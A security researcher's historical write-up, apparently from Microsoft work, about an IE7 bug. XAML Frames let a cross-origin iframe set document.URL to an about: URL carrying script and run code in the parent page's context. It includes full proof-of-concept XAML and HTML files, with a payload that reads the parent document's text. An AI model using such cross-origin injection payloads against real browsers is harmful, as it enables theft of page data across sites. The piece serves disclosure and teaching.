While exploring the document.URL = "about:..." quirk from the IE 5.5 research, I found that XAML <Frame> elements in IE behaved differently from ordinary HTML iframes. Inside a XAML Frame, the about: protocol still accepted arbitrary text as content — the same behavior that IE 5.5 had, but now resurfaced in a WPF/XAML browsing context. That meant the full UXSS from the IE 5.5 case was now reproducible in a modern IE7 browser, as long as the page was loaded inside a XAML Frame.

<Page	xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
		WindowTitle="xamlFrameClipboardRead">
	<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
	<Bold>This is a XAML Frame:</Bold>
		<LineBreak /><LineBreak /><LineBreak />
		&lt;<Bold>Frame</Bold> Width="700" Height="600" Source="domain1.html" /&gt;
		<LineBreak /><LineBreak />
		<Frame Width="700" Height="600" Source="domain1.html" />
	</TextBlock>
</Page>

domain1.html (the HTML page hosted inside the XAML Frame, explaining the technique):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_XAML_documentURLAbout</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>xDom_XAML_documentURLAbout</h2>
</center>
<hr />
<br />
This little bug is interesting because it works only inside XAML Frames, which allow us to load URLs like this one:<br />
<b>about:&lt;script&gt;alert()&lt;/script&gt;</b>
<br /><br />

Usually, when you change the URL of an IFRAME (from inside the iframe) to about:blank, it will do it keeping the domain which changed
the URL. For example, if you do a location.href = "about:blank"  from inside an iframe, the domain of that "about:blank" will continue
belonging to the same iframe domain.<br /><br />

Now, the point here is that if you change the URL (to about:blank) using a <b>document.URL</b> instead a location.href, it will change
the domain to its parent.<br /><br />

So now that we can use again (like the old days of IE5.5) the about: protocol to write anything, we can write a script from inside an IFRAME
and access its parent document.
<hr />
The iframe has a file with only this instruction:<br /><br />
<b>document.URL</b> ="about:&lt;script&gt;alert(parent.document.body.innerText)&lt;\/script&gt;";<br /><br />
<center>
<iframe src="http://www.iframe.com/crash/18/anotherdomain.html" width="400" height="200"></iframe>
</center>
</body>
</html>

anotherdomain.html (cross-origin iframe content that sets document.URL):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_IE55_documentURLAbout</title></head>
<body>
This file should be located on a different domain than the top window.
<script language="JavaScript">
document.URL ="about:<script>alert(parent.document.body.innerText)<\/script>This text is written using the <b>about:whatever</b> protocol.";
</script>
</body>
</html>

The WPF XAML <Frame> element rendered HTML content through a different code path than the standard IE HTML renderer, and that path preserved the old IE 5.5 behavior of allowing about:arbitrary-text as a valid URL. Combined with the document.URL domain-assignment quirk (which re-parents the about: page to the parent domain instead of the iframe’s domain), a cross-origin iframe inside a XAML Frame could inject and execute script in the parent’s security context. It was a feature from an older era of IE that had not been properly audited when XAML browsing support was added.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.